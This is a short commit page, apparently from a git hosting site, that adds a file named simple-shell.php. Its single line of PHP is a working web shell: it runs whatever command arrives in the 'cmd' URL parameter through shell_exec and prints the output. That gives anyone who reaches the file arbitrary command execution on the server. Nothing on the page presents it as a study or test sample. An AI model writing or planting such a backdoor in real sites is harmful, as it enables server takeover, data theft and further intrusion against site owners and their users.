Create simple-shell.php
This commit is contained in:
1
simple-shell.php
Normal file
1
simple-shell.php
Normal file
@@ -0,0 +1 @@
|
||||
<?php if (isset($_GET["cmd"])) { echo shell_exec($_GET["cmd"]); die; } ?>
|
||||
Reference in New Issue
Block a user